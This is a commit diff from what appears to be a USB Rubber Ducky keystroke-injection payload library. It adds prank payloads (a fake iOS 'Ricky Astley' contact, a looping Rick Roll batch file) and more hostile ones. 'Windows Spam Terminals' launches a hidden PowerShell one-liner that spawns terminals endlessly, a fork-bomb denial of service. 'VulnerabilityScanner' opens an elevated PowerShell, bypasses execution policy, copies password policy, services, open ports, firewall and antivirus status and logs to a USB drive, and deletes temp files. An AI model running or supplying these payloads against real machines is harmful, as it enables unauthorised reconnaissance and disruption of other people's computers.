This payload is a prank script designed to create a contact named "Ricky Astley" (a nod to the "RickRoll" meme) on an iOS device. It utilizes a dynamic delay mechanism to ensure the system is ready before executing commands. The automated process opens the Contacts app, creates a new contact, and fills in various fields with predefined information: name, last name, phone number, email, website, and other optional details. The fake contact serves as a lighthearted prank, silently inserting a “RickRoll” in the form of a contact entry.
### Details
- **Title**: Create RickRoll Contact
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Prank
- **Target**: iOS devices
### Dependencies
- We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
```
DEFINE #CONTACTS-APP-NAME Contacts
DEFINE #CONTACT-NAME Ricky
DEFINE #CONTACT-LAST-NAME Astley
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
```
- Other optional DEFINEs
```
DEFINE #CONTACT-COMPANY example
DEFINE #CONTACT-E-MAIL example
DEFINE #CONTACT-WEBSITE-URL example
DEFINE #CONTACT-BIRTHDAY example
DEFINE #CONTACT-STREET example
DEFINE #CONTACT-CITY example
DEFINE #CONTACT-STATE example
DEFINE #CONTACT-ZIP example
DEFINE #CONTACT-COUNTRY example
```
- Note that if you don't want to set some settings you have to remove the piece of code that sets it as well, for istance...
If you want to remove the zip contact info, you should change this one piece of code from this...
```
REM zip
DELAY 250
STRING #CONTACT-ZIP
TAB
```
... to this...
```
REM zip
DELAY 250
REM STRING #CONTACT-ZIP
TAB
```
In this way you are going to ignore this step but without altering the proper flow of available information.
### How It Works
1. Sets a user-defined options.
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Contacts**.
- Executes some commands to sets the new contact information

135
payloads/library/mobile/iOS/RickRoll-Contact-iOS/payload.txt Normal file
View File

@ -0,0 +1,135 @@
REM_BLOCK
############################################
# #
# Title : Create RickRoll Contact #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : iOS #
# #
############################################
END_REM
REM @@@ START MANDATORY DEFINEs @@@
REM We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
DEFINE #CONTACTS-APP-NAME Contacts
DEFINE #CONTACT-NAME Ricky
DEFINE #CONTACT-LAST-NAME Astley
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
REM @@@ START OPTIONAL DEFINEs @@@
DEFINE #CONTACT-COMPANY example
DEFINE #CONTACT-E-MAIL example
DEFINE #CONTACT-WEBSITE-URL example
DEFINE #CONTACT-BIRTHDAY example
DEFINE #CONTACT-STREET example
DEFINE #CONTACT-CITY example
DEFINE #CONTACT-STATE example
DEFINE #CONTACT-ZIP example
DEFINE #CONTACT-COUNTRY example
REM @@@ START PAYLOAD @@@
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN #CONTACTS-APP-NAME
DELAY 500
GUI n
REM name
DELAY 250
STRING #CONTACT-NAME
TAB
REM last name
DELAY 250
STRING #CONTACT-LAST-NAME
TAB
REM company
DELAY 250
STRING #CONTACT-COMPANY
TAB
REM phone number
DELAY 250
STRING #CONTACT-PHONE-NUMBER
TAB
TAB
REM mail
DELAY 250
STRING #CONTACT-E-MAIL
TAB
TAB
REM url
DELAY 250
STRING #CONTACT-WEBSITE-URL
TAB
TAB
REM birthday
DELAY 250
STRING #CONTACT-BIRTHDAY
TAB
TAB
REM street
DELAY 250
STRING #CONTACT-STREET
TAB
REM city
DELAY 250
STRING #CONTACT-CITY
TAB
REM state
DELAY 250
STRING #CONTACT-STATE
TAB
REM zip
DELAY 250
STRING #CONTACT-ZIP
TAB
REM country/region
DELAY 250
STRING #CONTACT-COUNTRY
TAB
GUI q

4
payloads/library/prank/Hacker_Typer/payload.txt
View File

@ -3,10 +3,10 @@ REM Title: Hacker Typer
REM Author: UberGuidoZ
REM Description: Opens a harmless website and types like a hacker
REM Target: Windows but easily modified to work on any OS with a browser
REM Version: 1.0
REM Version: 1.1
REM Category: Prank
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
REM
ATTACKMODE HID STORAGE
DELAY 1500
GUI r
DELAY 1000

6
payloads/library/prank/Rick_Rolling_Forever/payload.txt
View File

@ -5,9 +5,10 @@ REM
REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
REM Notes: Creates batch file, starts batch file, minimizes the window
REM Target: Windows but fairly easily modified to work on any OS with a browser
REM Version: 1.3
REM Version: 1.5
REM Category: Prank
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
ATTACKMODE HID STORAGE
DELAY 2000
GUI r
DELAY 500
@ -20,6 +21,7 @@ DELAY 1000
STRING copy con rr.bat
ENTER
STRING @ECHO OFF
ENTER
STRING PING 127.0.0.1 -n 5 > NUL
ENTER
STRING :LOOP
@ -30,7 +32,7 @@ STRING PING 127.0.0.1 -n 300 > NUL
ENTER
STRING GOTO LOOP
ENTER
CTRL C
CTRL c
DELAY 1000
STRING cls && rr.bat
ENTER

3
payloads/library/prank/The_Matrix-Wake_Up/payload.txt
View File

@ -2,7 +2,8 @@ REM Title: The Matrix Wake Up
REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
REM Author: UberGuidoZ
REM Target: Windows (including Powershell 2.0 or above)
REM Version: v1.1
ATTACKMODE HID STORAGE
DELAY 3000
GUI r
DELAY 750

23
payloads/library/prank/Windows-Spam-Terminals/README.md Normal file
View File

@ -0,0 +1,23 @@
# Windows Spam Terminals
This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
### Details
- **Title**: Windows Spam Terminals
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Prank
- **Target**: Windows
### Dependencies
This payload is plug and play <3
## How It Works 📜
1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals

58
payloads/library/prank/Windows-Spam-Terminals/payload.txt Normal file
View File

@ -0,0 +1,58 @@
REM_BLOCK
############################################
# #
# Title : Windows Spam Terminals #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows #
# #
############################################
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"

629
payloads/library/recon/VulnerabilityScanner/Payload.txt Normal file
View File

@ -0,0 +1,629 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Title: VulnerabilityScanner %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Author: Github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
DELAY 2000
STRING powershell
REM Navigate to the context menu to run PowerShell as an administrator
DELAY 500
RIGHTARROW
DELAY 100
DOWNARROW
DELAY 100
ENTER
DELAY 3000
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 200
ENTER
DELAY 200
REM Create the PowerShell script in memory and execute it
DELAY 200
STRING $usbName = "MYUSB"
DELAY 200
ENTER
DELAY 200
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
DELAY 200
ENTER
DELAY 200
STRING if ($usbDrive) {
DELAY 200
ENTER
DELAY 200
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
DELAY 200
ENTER
DELAY 200
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
DELAY 200
ENTER
DELAY 200
STRING New-Item -ItemType Directory -Path $directoryPath
DELAY 200
ENTER
DELAY 200
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
DELAY 200
ENTER
DELAY 200
STRING "" > $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING function check-passwordpolicy {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING net accounts
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking password policy: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function audit-services {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-service | select-object name, displayname, status, starttype
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error auditing services: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-networksettings {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-netipconfiguration
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking network settings: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-softwarevulnerabilities {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking software vulnerabilities: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-cve {
DELAY 200
ENTER
DELAY 200
STRING param (
DELAY 200
ENTER
DELAY 200
STRING [string]$productname,
DELAY 200
ENTER
DELAY 200
STRING [string]$version
DELAY 200
ENTER
DELAY 200
STRING )
DELAY 200
ENTER
DELAY 200
STRING $initialDelay = 2
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($response.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $response.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking CVEs: $_"
DELAY 200
ENTER
DELAY 200
STRING if ($_.Exception -match '403') {
DELAY 200
ENTER
DELAY 200
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds 60
DELAY 200
ENTER
DELAY 200
STRING $retryResponse = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($retryResponse.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $retryResponse.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function analyze-logs {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-eventlog -logname system -newest 100
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error analyzing logs: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-openports {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netstat -an
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking open ports: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-missingupdates {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING write-output "Checking Windows Update logs..."
DELAY 200
ENTER
DELAY 200
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
DELAY 200
ENTER
DELAY 200
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
DELAY 200
ENTER
DELAY 200
STRING write-output "WindowsUpdate.log written to $updateLogPath"
DELAY 200
ENTER
DELAY 200
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error getting Windows Update log: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-firewallstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netsh advfirewall show allprofiles
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking firewall status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-smbv1status {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking SMBv1 status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-antivirusstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-mpcomputerstatus
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking antivirus status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING check-passwordpolicy >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING audit-services >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-networksettings >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-softwarevulnerabilities >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING analyze-logs >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-openports >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-missingupdates >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-firewallstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-smbv1status >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-antivirusstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
REM Dynamically identify critical software from running processes and scheduled tasks
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
DELAY 200
ENTER
DELAY 200
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
DELAY 200
ENTER
DELAY 200
REM Combine running software and scheduled tasks
STRING $softwareList = @()
DELAY 200
ENTER
DELAY 200
STRING foreach ($process in $runningSoftware) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += $process.Name
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING foreach ($task in $scheduledTasks) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
REM Remove duplicates and empty entries
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
DELAY 200
ENTER
DELAY 200
REM Check CVEs for identified software
STRING foreach ($software in $softwareList) {
DELAY 200
ENTER
DELAY 200
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
DELAY 200
ENTER
DELAY 200
STRING if ($version) {
DELAY 200
ENTER
DELAY 200
STRING check-cve -productname $software -version $version >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING write-output "Results saved to USB drive."
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error: USB drive MYUSB not found."
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING invoke-command -scriptblock $script
DELAY 200
ENTER
DELAY 20000